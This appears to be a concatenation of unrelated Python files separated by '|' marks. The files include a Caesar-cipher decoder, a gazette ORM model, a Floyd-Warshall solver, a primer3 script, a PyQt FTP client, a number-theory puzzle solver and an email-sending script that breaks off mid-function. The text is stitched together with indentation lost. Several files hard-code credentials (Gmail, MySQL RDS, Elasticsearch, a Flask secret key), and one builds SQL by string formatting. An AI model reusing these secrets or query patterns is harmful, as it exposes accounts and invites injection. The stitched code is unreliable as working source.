if task[1] <= quantum:
elapsed_time += task[1]
print("{} {}".format(task[0], elapsed_time))
else:
elapsed_time += quantum
queue.push((task[0], task[1] - quantum))
|
#!/usr/bin/python
# k - m
# o - q
# e - g
# s - q shift by 2 letters mod 26
stringdata = "g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj."
chars = []
for ch in stringdata:
if ch == "y":
chars.append("a")
elif ch == "z":
chars.append("b")
elif ch.isalpha():
a = (ord(ch)+2%26)
chars.append(chr(a))
else:
chars.append(ch)
print "".join(chars)
|
from collections import namedtuple
from onegov.core.crypto import random_token
from onegov.core.orm import Base
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UTCDateTime
from onegov.file import AssociatedFiles
from onegov.file import File
from onegov.file.utils import as_fileintent
from sedate import as_datetime
from sedate import standardize_date
from sqlalchemy import Column
from sqlalchemy import Date
from sqlalchemy import extract
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy_utils import observes
from sqlalchemy.orm import object_session
class IssueName(namedtuple('IssueName', ['year', 'number'])):
""" An issue, which consists of a year and a number.
The issue might be converted from to a string in the form of 'year-number'
for usage in forms and databases.
"""
def __repr__(self):
return '{}-{}'.format(self.year, self.number)
@classmethod
def from_string(cls, value):
return cls(*[int(part) for part in value.split('-')])
class IssuePdfFile(File):
__mapper_args__ = {'polymorphic_identity': 'gazette_issue'}
class Issue(Base, TimestampMixin, AssociatedFiles):
""" Defines an issue. """
__tablename__ = 'gazette_issues'
#: the id of the db record (only relevant internally)
id = Column(Integer, primary_key=True)
#: The name of the issue.
name = Column(Text, nullable=False)
#: The number of the issue.
number = Column(Integer, nullable=True)
# The issue date.
date = Column(Date, nullable=True)
# The deadline of this issue.
deadline = Column(UTCDateTime, nullable=True)
@property
def pdf(self):
return self.files[0] if self.files else None
@pdf.setter
def pdf(self, value):
filename = '{}.pdf'.format(self.name)
pdf = self.pdf or IssuePdfFile(id=random_token())
pdf.name = filename
pdf.reference = as_fileintent(value, filename)
if not self.pdf:
self.files.append(pdf)
def notices(self, state=None):
""" Returns a query to get all notices related to this issue. """
from onegov.gazette.models.notice import GazetteNotice # circular
notices = object_session(self).query(GazetteNotice)
notices = notices.filter(
GazetteNotice._issues.has_key(self.name) # noqa
)
if state:
notices = notices.filter(GazetteNotice.state == state)
return notices
@property
def first_publication_number(self):
""" Returns the first publication number of this issue based on the
last issue of the same year. """
from onegov.gazette.models.notice import GazetteNotice # circular
session = object_session(self)
issues = session.query(Issue.name)
issues = issues.filter(extract('year', Issue.date) == self.date.year)
issues = issues.filter(Issue.date < self.date)
issues = [issue[0] for issue in issues]
if not issues:
return 1
numbers = []
for issue in issues:
query = session.query(GazetteNotice._issues[issue])
query = query.filter(GazetteNotice._issues.has_key(issue)) # noqa
numbers.extend([int(x[0]) for x in query if x[0]])
return max(numbers) + 1 if numbers else 1
def publication_numbers(self, state=None):
""" Returns a dictionary containing all publication numbers (by notice)
of this issue.
"""
from onegov.gazette.models.notice import GazetteNotice # circular
query = self.notices(state).with_entities(
GazetteNotice.id,
GazetteNotice._issues[self.name]
)
return dict(query)
@property
def in_use(self):
""" True, if the issued is used by any notice. """
if self.notices().first():
return True
return False
@observes('date')
def date_observer(self, date_):
""" Changes the issue date of the notices when updating the date
of the issue.
At this moment, the transaction is not yet commited: Querying the
current issue returns the old date.
"""
issues = object_session(self).query(Issue.name, Issue.date)
issues = dict(issues.order_by(Issue.date))
issues[self.name] = date_
issues = {
key: standardize_date(as_datetime(value), 'UTC')
for key, value in issues.items()
}
for notice in self.notices():
dates = [issues.get(issue, None) for issue in notice._issues]
dates = [date for date in dates if date]
notice.first_issue = min(dates)
def publish(self, request):
""" Publishes the issue.
This ensures that every accepted notice of this issue is published. It
then creates the PDF while assigning the publications numbers (it uses
the highest publication number of the last issue of the same year as a
starting point.
"""
for notice in self.notices('accepted'):
notice.publish(request)
from onegov.gazette.pdf import IssuePdf # circular
self.pdf = IssuePdf.from_issue(
issue=self,
request=request,
first_publication_number=self.first_publication_number,
links=request.app.principal.links
)
|
INF = 1e9
if __name__ == "__main__":
while True:
n, m, q = map(int, input().split())
if n == 0 and m == 0 and q == 0:
break
dist = [[INF for _ in range(n)] for __ in range(n)]
for i in range(n):
dist[i][i] = 0
for _ in range(m):
u, v, d = map(int, input().split())
dist[u][v] = min(dist[u][v], d)
for k in range(n):
for i in range(n):
for j in range(n):
if dist[i][k] < INF and dist[k][j] < INF:
dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])
for k in range(n):
for i in range(n):
for j in range(n):
if dist[k][k] < 0 and dist[i][k] != INF and dist[k][j] != INF:
dist[i][j] = -INF
for _ in range(q):
u, v = map(int, input().split())
if dist[u][v] == INF:
print("Impossible")
elif dist[u][v] == -INF:
print("-Infinity")
else:
print(dist[u][v])
print()
|
#!/usr/bin/env python3
import vcf
import pysam
import primer3
import argparse
import sys
def get_ref_dict(reffilename):
reffile = pysam.FastaFile(reffilename)
return {r : reffile.fetch(region=r) for r in reffile.references}
def make_primers_in_vcf(vcfreader, referencedict, exclusions):
print('\t'.join(['chr', 'pos', 'left', 'right', 'leftpos', 'rightpos']))
for record in vcfreader:
res = make_primer_for_record(record, referencedict, exclusions)
res = short_result(res)
if not res['left'] or not res['right']:
print("Could not create a primer pair for coordinate", res['chr'], res['pos'], file = sys.stderr)
continue
line = array_result(res)
print('\t'.join(line))
def make_primer_for_record(record, referencedict, exclusions):
chrom = record.CHROM
pos = record.POS
seqid = str(chrom) + ":" + str(pos)
seq_args = {
'SEQUENCE_ID' : seqid,
'SEQUENCE_TEMPLATE' : referencedict[chrom],
'SEQUENCE_TARGET' : [pos, 1]
}
if exclusions is not None:
ex = exclusions[chrom]
seq_args['SEQUENCE_EXCLUDED_REGION'] = [e for e in ex if e is not [pos,1]]
global_args = {
'PRIMER_TASK' : 'pick_sequencing_primers',
'PRIMER_FIRST_BASE_INDEX' : 1
}
# global_args = {
# 'PRIMER_TASK' : 'pick_discriminative_primers',
# 'PRIMER_FIRST_BASE_INDEX' : 1,
# 'PRIMER_PICK_ANYWAY' : 1,
# 'PRIMER_PRODUCT_SIZE_RANGE' : [[36,300]]
# }
# libdict = {k:v for k,v in referencedict.items() if k is not chrom}
result = primer3.bindings.designPrimers(seq_args = seq_args, global_args = global_args)
result['chr'] = chrom
result['pos'] = pos
return result
def short_result(p3dict):
return {
'chr' : p3dict.get('chr'),
'pos' : p3dict.get('pos'),
'left' : p3dict.get('PRIMER_LEFT_0_SEQUENCE',''),
'right' : p3dict.get('PRIMER_RIGHT_0_SEQUENCE',''),
'leftpos' : p3dict.get('PRIMER_LEFT_0',[''])[0],
'rightpos' : p3dict.get('PRIMER_RIGHT_0',[''])[0]
}
def array_result(res):
return [str(res[k]) for k in ['chr', 'pos', 'left', 'right', 'leftpos', 'rightpos']]
def parse_args():
parser = argparse.ArgumentParser(description =
"""Create primers using primer3 from a given reference
to sequence sites in a given vcf.
"""
)
parser.add_argument("-v", "--vcf", help = "VCF containing sites to amplify", default = sys.stdin)
parser.add_argument("-r", "--reference", help = "Reference to create primers from")
parser.add_argument("-e", "--exclude", help = """A vcf containing potentially variable sites to
exclude from overlapping the primers.""")
args = parser.parse_args()
return args
def load_files(vcffile, reffile):
reader = vcf.Reader(filename = vcffile)
if reffile is None:
print("Reference not given. Attempting to find one in the VCF header.", file = sys.stderr)
reffile = reader.metadata['reference']
if reffile.startswith('file://'):
reffile = reffile.replace('file://','',1)
print("Using", reffile, "as reference.", file = sys.stderr )
refdict = get_ref_dict(reffile)
return reader, refdict
def load_exclusions(exclusionfile):
reader = vcf.Reader(filename = exclusionfile)
d = dict()
for record in reader:
d.setdefault(record.CHROM, list()).append([record.POS,1])
return d
def main():
args = parse_args()
vcfreader, refdict = load_files(args.vcf, args.reference)
if args.exclude is not None:
exclusions = load_exclusions(args.exclude)
else:
exclusions = None
make_primers_in_vcf(vcfreader,refdict,exclusions)
if __name__ == '__main__':
main()
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
DEBUG=False
CSRF_ENABLED = True
SECRET_KEY = 'gO57w=09]SBP:x(<\lP~t>5mD@F;@]8|ZhE<k+B\T|0jD8azhXc.X[GwE}h0x7+0k:G)E^-0drgMw`fi/_Zle^Jp;*~<t?OV0kICBs-}u\<R,\TI<DCdXJg(DGnt,TwDl@*Ebc{~XO>h,XSq]HX}rL<va"r2Z=2edZl[X_P8v=^PKpbG-g2a1yponhRk]n:c7:)kEZF[K{=fZ&a.-=*dA&;C5,mS}<e!O>|[^zhOzwl#W'
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
#Weblab
LOGIN_URL = "https://weblab.deusto.es/weblab/client/#page=experiment&exp.category=Aquatic%20experiments&exp.name=aquariumg"
|
import json
import boto3
import datetime
import requests
import time
# Change before demo #
es_url = 'https://search-photos-bnrbmus63teifn3tn5obq24pjq.us-east-1.es.amazonaws.com'
s3_url = 'https://hw2-s3-bucket.s3.amazonaws.com/'
def lambda_handler(event, context):
lex = boto3.client('lex-runtime')
response = lex.post_text(
botName = 'HWTwoLex',
botAlias = 'dev',
userId = "AUser",
inputText = event['queryStringParameters']['q']
)
results = []
if response["intentName"] != 'SearchIntent':
print("- Could not extract with Lex.")
else:
for label in response['slots'].values():
if label:
print ('- Retrieving ES results for', label)
res = requests.get(es_url + '/photos/_doc/_search?q=' + label ,
auth = ('esmaster','Esmasterpass123!'),
headers = {"Content-Type": "application/json"})
for hit in res.json()['hits']['hits']:
results += [s3_url + hit['_source']['objectKey']]
print(results)
return {
'statusCode': 200,
'headers': {
"Access-Control-Allow-Origin": "*",
'Content-Type': 'application/json'
},
'body': json.dumps(results)
}
|
#!/usr/bin/python3
'''
convert srt to ass with a suitable format
'''
import argparse
from threading import Thread
import pysubs2
BORDER = 'ScaledBorderAndShadow'
FONT = 'DejaVu Sans'
FONT_SIZE = 20
MARGINV = 2
EN_STYLE = r'{\fs14}'
def main(srt_in):
subs = pysubs2.load(srt_in, encoding='UTF-8')
subs.info[BORDER] = 'no'
subs.styles['Default'].fontname = FONT
subs.styles['Default'].fontsize = FONT_SIZE
subs.styles['Default'].marginv = MARGINV
for sub in subs:
position = sub.text.find(r'\N')
if position != -1:
sub.text = sub.text[:position] \
+ r'\N' + EN_STYLE\
+ sub.text[position + 2:]
subs.save(srt_in[:-4] + '.ass', encoding='UTF-8')
if __name__ == '__main__':
PARSER = argparse.ArgumentParser(
description='convert srt format to ass with a suitable style.'
)
PARSER.add_argument(
'srt_input',
nargs='+',
help='input subtitles file(s)',
)
ARGS = PARSER.parse_args()
for arg in ARGS.srt_input:
Thread(target=main, args=[arg]).start()
|
from gui.model_view_components.remote_filesystem_model import FileItem
__author__ = 'Галлям'
from PyQt5 import QtWidgets, QtGui, QtCore
from core.core import Core
import gui.model_view_components.local_filesystem_view as local
import gui.model_view_components.remote_filesystem_view as remote
class MainWindow(QtWidgets.QMainWindow):
text_read = QtCore.pyqtSignal()
def __init__(self, parent: QtWidgets.QWidget=None):
super().__init__(parent)
self.actions = {}
self.menus = {}
self.edit_lines = {}
self.buttons = {}
self.layouts = {}
self.widgets = {}
self.core = Core()
self.create_edit_lines()
self.create_buttons()
self.create_actions()
self.create_menus()
self.create_layouts()
self.create_widgets()
self.create_toolbars()
self.setCentralWidget(self.widgets['central_widget'])
self.connect_widgets_and_layouts()
self.statusBar()
self.connect_signals_to_slots()
def connect_widgets_and_layouts(self):
self.widgets['central_widget'].setLayout(self.layouts['main_layout'])
self.widgets['conn_widget']. \
setLayout(self.layouts['conn_toolbar_layout'])
self.layouts['dir_models_layout']. \
addWidget(self.widgets['local_filesystem'])
self.layouts['dir_models_layout']. \
addWidget(self.widgets['remote_filesystem'])
self.layouts['main_layout']. \
insertWidget(0, self.widgets['log_browser'])
self.layouts['main_layout'].addLayout(self.layouts['dir_models_layout'])
def contextMenuEvent(self, event):
menu = QtWidgets.QMenu(self)
menu.addAction(self.actions['exit_action'])
menu.exec(event.globalPos())
def create_menus(self):
file_menu = self.menuBar().addMenu("&File")
# file_menu.addAction(self.actions['new_action'])
self.menus['file_menu'] = file_menu
more_menu = file_menu.addMenu("&More")
more_menu.addAction(self.actions['exit_action'])
self.menus['more_menu'] = more_menu
def create_actions(self):
exit_action = QtWidgets.QAction("&Exit", self)
exit_action.setShortcuts(QtGui.QKeySequence.Quit)
exit_action.triggered.connect(self.close)
self.actions['exit_action'] = exit_action
def create_edit_lines(self):
host_edit = QtWidgets.QLineEdit()
host_edit.setFixedSize(150, 25)
host_edit.setToolTip('Enter host name without protocol\r\n'
'FTP protocol only supported')
self.edit_lines['host_edit'] = host_edit
password_edit = QtWidgets.QLineEdit()
password_edit.setEchoMode(QtWidgets.QLineEdit.Password)
password_edit.setFixedSize(150, 25)
password_edit.setToolTip('Enter password\r\n'
'Password never be saved')
self.edit_lines['password_edit'] = password_edit
username_edit = QtWidgets.QLineEdit()
username_edit.setPlaceholderText('anonymous')
username_edit.setFixedSize(150, 25)
username_edit.setToolTip('Enter username\r\n'
'If skipped, '
'"anonymous" username will be used')
self.edit_lines['username_edit'] = username_edit
port_edit = QtWidgets.QLineEdit()
port_edit.setPlaceholderText('21')
port_edit.setFixedSize(50, 25)
port_edit.setValidator(QtGui.QIntValidator(0, 65536, port_edit))
self.edit_lines['port_edit'] = port_edit
def connect_remote_file_system(self):
self.core.ready_to_read_dirlist. \
connect(self.widgets['remote_filesystem']
.model()
.fetch_root)
self.core.update_remote_model.connect(self.widgets['remote_filesystem']
.model().refresh)
self.widgets['remote_filesystem'] \
.model() \
.directory_listing_needed \
.connect(self.core.get_directory_list)
# self.widgets['remote_filesystem'] \
# .model() \
# .file_uploading \
# .connect(self.core.upload_file)
def connect_signals_to_slots(self):
self.buttons['conn_button'].clicked.connect(self.send_conn_info)
for edit_line in self.edit_lines.values():
edit_line.returnPressed. \
connect(self.send_conn_info)
self.core.already_connected.connect(self.on_already_connected)
self.core.new_log.connect(self.widgets['log_browser'].append)
self.connect_remote_file_system()
self.widgets['local_filesystem'].model() \
.file_downloading.connect(self.core.start_file_downloading)
self.core.update_local_model.connect(self.widgets['local_filesystem']
.model().refresh)
def disconnect_old_remote_model(self):
self.core.update_remote_model.disconnect()
self.core.ready_to_read_dirlist.disconnect()
def on_already_connected(self):
warning_window = QtWidgets.QMessageBox()
warning_window.setWindowTitle("Are you sure want to reconnect?")
warning_window.setText("If you reconnect, all of your "
"connections and transfers "
"will be lost.\r\n"
"Do you want to continue?")
yes_button = warning_window.addButton(QtWidgets.QMessageBox.Yes)
warning_window.addButton(QtWidgets.QMessageBox.No)
warning_window.setIcon(QtWidgets.QMessageBox.Warning)
warning_window.setWindowModality(QtCore.Qt.ApplicationModal)
warning_window.exec()
if warning_window.clickedButton() == yes_button:
self.core.set_connected(False)
self.widgets['remote_filesystem'].reinitialise()
self.disconnect_old_remote_model()
self.connect_remote_file_system()
self.send_conn_info()
else:
pass
def send_conn_info(self) -> None:
hostname = self.edit_lines['host_edit'].text()
username = self.edit_lines['username_edit'].text()
password = self.edit_lines['password_edit'].text()
port = self.edit_lines['port_edit'].text()
self.core.start_connecting(hostname, port, username, password)
def create_buttons(self):
conn_button = QtWidgets.QPushButton("Connect")
def keyPressEvent(e):
if e.key() == QtCore.Qt.Key_Enter or QtCore.Qt.Key_Return:
conn_button.click()
conn_button.keyPressEvent = keyPressEvent
self.buttons['conn_button'] = conn_button
def create_layouts(self):
conn_toolbar_layout = QtWidgets.QHBoxLayout()
conn_toolbar_layout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
host_form_layout = QtWidgets.QFormLayout()
password_form_layout = QtWidgets.QFormLayout()
username_form_layout = QtWidgets.QFormLayout()
port_form_layout = QtWidgets.QFormLayout()
host_form_layout.addRow('Host: ',
self.edit_lines['host_edit'])
username_form_layout.addRow('Username: ',
self.edit_lines['username_edit'])
password_form_layout.addRow('Password: ',
self.edit_lines['password_edit'])
port_form_layout.addRow('Port: ',
self.edit_lines['port_edit'])
conn_toolbar_layout.addLayout(host_form_layout)
conn_toolbar_layout.addLayout(username_form_layout)
conn_toolbar_layout.addLayout(password_form_layout)
conn_toolbar_layout.addLayout(port_form_layout)
conn_toolbar_layout.addWidget(self.buttons['conn_button'])
self.layouts['conn_toolbar_layout'] = conn_toolbar_layout
dir_models_layout = QtWidgets.QHBoxLayout()
self.layouts['dir_models_layout'] = dir_models_layout
main_layout = QtWidgets.QVBoxLayout()
self.layouts['main_layout'] = main_layout
def create_toolbars(self):
def create_main_toolbar():
main_toolbar = self.addToolBar('Main tools')
main_toolbar.addAction(self.actions['exit_action'])
main_toolbar.insertSeparator(self.actions['exit_action'])
main_toolbar.setAllowedAreas(QtCore.Qt.TopToolBarArea)
main_toolbar.setFloatable(False)
main_toolbar.setMovable(False)
self.addToolBarBreak()
def create_connection_toolbar():
connection_toolbar = self.addToolBar('Connection tools')
connection_toolbar.addWidget(self.widgets['conn_widget'])
connection_toolbar.setFloatable(False)
connection_toolbar.setMovable(False)
create_main_toolbar()
create_connection_toolbar()
def create_widgets(self):
log_browser = QtWidgets.QTextEdit()
log_browser.textChanged.connect(self.core.on_log_read)
log_browser.setReadOnly(True)
self.widgets['log_browser'] = log_browser
local_filesystem = local.FileSystemExplorer()
self.widgets['local_filesystem'] = local_filesystem
remote_filesystem = remote.RemoteFileSystemExplorer()
self.widgets['remote_filesystem'] = remote_filesystem
conn_widget = QtWidgets.QWidget()
self.widgets['conn_widget'] = conn_widget
widget = QtWidgets.QWidget()
self.widgets['central_widget'] = widget
|
import math, time, matplotlib.pyplot as plt, numpy, functools
# The solution is 75737353,
# and it took 102.2976252 seconds to compute with version 5!
# After improving with version 7,
# it takes only 37.6414667 seconds to compute!
def getFactor(n):
for i in range(2, math.floor(math.sqrt(n))+1):
if not n % i:
return i
return n
def factorize(n):
numlist = {1}
while n - 1:
f = getFactor(n)
n //= f
numlist.update([f * x for x in numlist])
return sorted(numlist)
def naiveStealthy(n):
f = factorize(n)[::-1] # O(sqrt(n))
for i_a in range(len(f) - 1):
a = f[i_a]
b = n // a
for i_c in range(len(f) - 1):
c = f[i_c]
d = n // c
if a + b == c + d + 1: # O(|f|^2) = O(sqrt(n)^2) = O(n)
## if a < c:
## print(a, b, c, d, n)
return True
return False
def naiveCountStealthy(N):
return sum(naiveStealthy(n) for n in range(1, N)) # O(N^2)
def mixedParity(a, b):
return (a & 1) ^ (b & 1)
def impNaiveStealthy(n):
f = factorize(n)[::-1] # O(sqrt(n))
for i_a in range(len(f) - 1):
a = f[i_a]
b = n // a
i_b = f.index(b)
for i_c in range(i_a + 1, i_b):
c = f[i_c]
d = n // c
if a + b == c + d + 1: # O(|f|^2) = O(sqrt(n)^2) = O(n)
## if a < c:
## print(a, b, c, d, n, math.sqrt(n))
return True
return False
def impNaiveCountStealthy(N):
return sum(impNaiveStealthy(n) for n in range(4, N, 4)) # O(N^2)
def imp2NaiveStealthy(n):
f = factorize(n)[::-1] # O(sqrt(n))
halfLen = len(f) // 2
for i_a in range(halfLen):
a = f[i_a]
b = n // a
for i_c in range(i_a + 1, halfLen + 1):
c = f[i_c]
# x = a - c = y + 1 = d - b + 1 -> d = a + b - c - 1
if (a + b - c - 1) * c == n: # O(|f|^2) = O(sqrt(n)^2) = O(n)
## if a < c:
## print(a, b, c, d, n, math.sqrt(n))
return True
return False
def imp2NaiveCountStealthy(N):
return sum(imp2NaiveStealthy(n) for n in range(4, N, 4)) # O(N^2)
def imp3NaiveStealthy(n):
f = factorize(n) # O(sqrt(n))
L = len(f)
n4 = n * 4
for i_b in range(L // 2):
b = f[i_b]
a = f[L - i_b - 1]
m = a + b - 1
try:
radicand = m*m - n4
# We see that c = (m + sqrt(radicand)) / 2 and d = (m - sqrt(radicand)) / 2
if not math.sqrt(radicand) % 1: # O(sqrt(n))
return True
except:
# Negative radicand, just ignore
pass
return False
def imp3NaiveCountStealthy(N):
return sum(imp3NaiveStealthy(n) for n in range(4, N, 4)) # O(N*sqrt(N))
def imp4NaiveStealthy(n):
factorSums = set()
f = factorize(n) # O(sqrt(n))
L = len(f)
for i_b in range(L // 2, -1, -1):
b = f[i_b]
a = f[L - i_b - 1]
s = a + b
if s + 1 in factorSums or s - 1 in factorSums:
## print(n // 4, n, a, b, conditions(n // 4))
return True
factorSums.add(s)
return False
def imp4NaiveCountStealthy(N):
return sum(imp4NaiveStealthy(n) for n in range(4, N, 4)) # O(N*sqrt(N))
def imp5NaiveCountStealthy(N): # THIS ONE WORKED!
# Each stealthy number n corresponds exactly to one product of triangular numbers equal to n/4
# TRI_PRODUCTS generation takes O(sqrt(N)^2) = O(N) time
## return sum(imp5NaiveStealthy(n) for n in range(4, N, 4)) # O(N)
N4 = N // 4
return len([t for t in TRI_PRODUCTS if t <= N4])
@functools.lru_cache(10**7)
def imp6CountStealthy(N): # BROKEN
ret = 0
for T in sorted(TRIANGULARS): # O(sqrt(N))
if T < N:
## i = countTriangularsTo(N // T)
potentialProds = countTriangularsTo(N // T) # O(1)
## print(N, T, i, potentialProds)
ret += potentialProds
## print(ret)
return ret # O(sqrt(N))
def imp7CountStealthy(N):
N4 = N // 4
ret = set()
ls = sorted(TRIANGULARS)
for i in range(len(ls)):
for j in range(i, len(ls)):
to_add = ls[i] * ls[j]
if to_add <= N4:
ret.add(to_add)
else:
break
return len(ret)
def genTriangulars(N):
ret = set()
x = 1
inc = 2
while x < N:
ret.add(x)
x += inc
inc += 1
return ret
def countTriangularsTo(N):
return int(math.sqrt(1 + 8 * N) - 1) // 2
def products(ls, T_index = 6):
## T = sorted(TRIANGULARS)[T_index]
## origs = dict()
## colls = set()
ret = set()
for i in range(len(ls)):
for j in range(i, len(ls)):
to_add = ls[i] * ls[j]
if to_add <= N: # THIS WAS THE CRUCIAL INGREDIENT!
## if to_add in ret:
## orig_i, orig_j = origs[to_add]
## if T in [ls[i], ls[j], orig_i, orig_j]:
## colls.add((to_add, ls[i], ls[j], orig_i, orig_j))
## print("COLLISION: ", to_add)
## else:
## origs[to_add] = (ls[i], ls[j])
ret.add(to_add)
else:
break
## print(f"{T_index} : \t{T}\tCOLLISIONS --", len(colls), len(factorize(T)))
## for c, i, j, orig_i, orig_j in sorted(colls):
## print(c, i, j, orig_i, orig_j)
return ret
N = 10**14
##start = time.perf_counter()
##ls = naiveCountStealthy(N)
##end = time.perf_counter()
##print(end - start)
##start = time.perf_counter()
##ls2 = imp2NaiveCountStealthy(N)
##end = time.perf_counter()
##print(end - start)
##start = time.perf_counter()
##ls3 = imp3NaiveCountStealthy(N)
##end = time.perf_counter()
##print(end - start)
##print(ls3)
def conditions(n):
ret = []
## n_T = (math.sqrt(1 + 8 * n) - 1) // 2
## if n_T * (n_T + 1) // 2 == n:
## ret.append("triangular")
## n_T = (math.sqrt(1 + 8 * n) - 1) // 2
## if not n % 10:
## n_T10 = (math.sqrt(1 + 8 * n // 10) - 1) // 2
## if n_T10 * (n_T10 + 1) // 2 == n // 10:
## ret.append("10x triangular")
## if not n % 9:
## ret.append("mult9")
## if not n % 3:
## ret.append("mult3")
## if n in TRIANGULARS:
## ret.append("triangular")
if n in TRI_PRODUCTS:
ret.append("triproduct")
return ", ".join(ret)
##start = time.perf_counter()
##ls4 = imp4NaiveCountStealthy(N)
####tri4 = (math.sqrt(1 + 2 * N) - 1) // 2
##end = time.perf_counter()
##print(end - start)
##print(ls4, tri4, tri4 / ls4)
##
##start = time.perf_counter()
##ls4 = imp4NaiveCountStealthy(10*N)
##end = time.perf_counter()
##print(end - start)
##print(ls4)
##print(ls3, ls4)
start = time.perf_counter()
TRIANGULARS = genTriangulars(N // 4) # O(sqrt(N)) time
##for i in range(len(TRIANGULARS)):
## print("i : ", i)
## TRI_PRODUCTS = products(list(TRIANGULARS), i) # O(sqrt(N)^2) = O(N) time
##TRI_PRODUCTS = products(sorted(TRIANGULARS)) # O(sqrt(N)^2) = O(N) time
##ls5 = imp5NaiveCountStealthy(N) # O(N) time
ls7 = imp7CountStealthy(N)
end = time.perf_counter()
print(end - start)
print(ls7)
##start = time.perf_counter()
##TRIANGULARS = genTriangulars(N // 4) # O(sqrt(N)) time
##ls6 = imp6CountStealthy(N) # O(sqrt(N)) time
##end = time.perf_counter()
##print(end - start)
##print(ls5, ls6)
##xs = []
##for mag in range(3, 6):
## for mult in range(1, 10, 2):
## xs.append(mult * 10 ** mag)
##ys = [imp3NaiveCountStealthy(x) for x in xs]
##
##def log(xs):
## return [math.log(x) for x in xs]
##
##plyft = numpy.polyfit(log(xs), log(ys), 1)
##print(plyft)
##
##fs = [x**plyft[0] * math.exp(plyft[1]) for x in xs]
##
####plt.scatter(log(xs), log(ys))
##plt.scatter(xs, ys)
##plt.plot(xs, fs)
##plt.show()
##ts = list(range(1,10**3))
##stealthy = [t*imp4NaiveStealthy(t) for t in ts]
##plt.scatter(ts, stealthy)
##plt.show()
##last = 0
##for x in range(2, N):
## if imp2NaiveStealthy(x):
## print(f"{x}\t{x % 4}\t{x%8}\t{x%12}\t{x%16}\t{x-last}")
## last = x
# ----- Trying a multilinear regression to detect some pattern I don't see -----
# INPUTS:
# pi function (prime count), number of divisors, remainder modulo 4, 8, 12?
# OUTPUTS:
# stealthy count
|
#!/usr/bin/python3
"""This module performs math on matrices"""
def matrix_divided(matrix, div):
"""This method divides each element in a matrix
Args:
matrix (list or lists): the matrix
div (int): the number to divide each element by
Attributes:
err_1 (str): error message 1
err_2 (str): error message 2
err_3 (str): error message 3
err_4 (str): error message 4
"""
err_1 = "matrix must be a matrix (list of lists) of integers/floats"
err_2 = "Each row of the matrix must have the same size"
err_3 = "div must be a number"
err_4 = "division by zero"
# Checks if matrix is a list
if not isinstance(matrix, list):
raise TypeError(err_1)
# Checks if the first element in matrix is a list so len can be used
if isinstance(matrix[0], list):
rowlen = len(matrix[0])
# Checking if matrix is formatted correctly
for mtx in matrix:
# Checks if mtx is a list
if not isinstance(mtx, list):
raise TypeError(err_1)
# Checks if the length of each row is the same
if len(mtx) != rowlen:
raise TypeError(err_2)
# Checks if the elements in the matrix are int or float
for elmnt in mtx:
if not isinstance(elmnt, (int, float)):
raise TypeError(err_1)
# Checks if div is a number
if not isinstance(div, (int, float)):
raise TypeError(err_3)
# Checks if div is 0
if div == 0:
raise ZeroDivisionError(err_4)
# Dividing original matrix and creating a new matrix
new_matrix = [[round(idx / div, 2) for idx in mtx] for mtx in matrix]
return new_matrix
|
#!/home/myuser/bin/python
not_sent_emails = []
import smtplib as s
import ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import numpy
import sys; sys.path.append('/home/ec2-user/anaconda3/lib/python3.8/site-packages/mysql')
import mysql.connector
from mysql.connector import errorcode
import pandas as pd
import helper_functions
def send(name_of_email, subject, content, student_fname, email, pemail, list_of_content, extra_content = None):
port = 465
sender = "helmlearning2020@gmail.com"
password = "h3lml3arning"
message = MIMEMultipart("alternative")
message["Subject"] = subject.format(list_of_content[0])
message["From"] = "HELM Learning"
message["To"] = email
if name_of_email == "e1":
if extra_content != None: content = content.replace("5 Weeks, once per week)", extra_content)
if "weeklong" in list_of_content[5]:
content = content.replace("5 Weeks, once per week)", "5 days in a week, Mon-Fri)")
elif name_of_email == "esa":
breaf = list_of_content[0]
list_of_content[0] = list_of_content[1]
list_of_content[1] = breaf
html = content.format(
student_fname[0].upper() + student_fname[1:],
*list_of_content
)
# print(html)
part2 = MIMEText(html, "html")
message.attach(part2)
context = ssl.create_default_context()
with s.SMTP_SSL("smtp.gmail.com", port, context=context) as server:
server.login(sender, password)
try:
#input("send?")
server.sendmail(sender, email, message.as_string())
server.sendmail(sender, pemail, message.as_string())
print("Sent!\n")
except:
print("NOT SENT\n")
not_sent_emails.append(email)
not_sent_emails.append(pemail)
config = {
'user': 'helmlearning',
'password': 'H3lml3arning',
'host': 'helmlearningdatabase-1.cnoqlueuri3g.us-east-1.rds.amazonaws.com', #52.21.172.100:22
'port': '3306',
'database': 'HELM_Database'
}
months = {
1: "Jan",
2: "Feb",
3: "March",
4: "April",
5: "May",
6: "June",
7: "July",
8: "Aug",
9: "Sept",
10: "Oct",
11: "Nov",
12: "Dec"
}
skipping_weeks = [
[2020, 11, 23, " (skipping the week of Thanksgiving, <br>Nov 23 2020 - Nov 29 2020)"],
[2020, 12, 21, " (skipping the weeks of Christmas and New Years, <br>Dec 21 2020 - Jan 3 2021)"]
]
def create_connection():
"""
Returns a database connection using mysql.connector
"""
# open database connection
global cnx
try:
cnx = mysql.connector.connect(**config)
return cnx
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
raise
def e1(class_name, cursor):
sql5 = 'SELECT id, last_student FROM classes WHERE short_name = "{}"'.format(class_name)
sql4 = 'SELECT student_id FROM classes_to_students WHERE class_id = "{}" AND timestamp > "{}"'
sql2 = 'SELECT name, teacher, e1_summary, starttime, endtime, day, startdate, day, enddate, zoom, zoom, e1_additionalwork, teacher, email, name FROM classes WHERE short_name = "%s";' % (class_name[0].upper() + class_name[1:])
sql3 = 'SELECT subject, content FROM templates WHERE name="{}"'.format("e1")
sql = 'SELECT Email_Address, Parent_Email, Student_Name FROM students WHERE id = {}'
sql_e2 = 'SELECT student_cap FROM classes WHERE short_name = "{}"'.format(class_name)
cursor.execute(sql_e2)
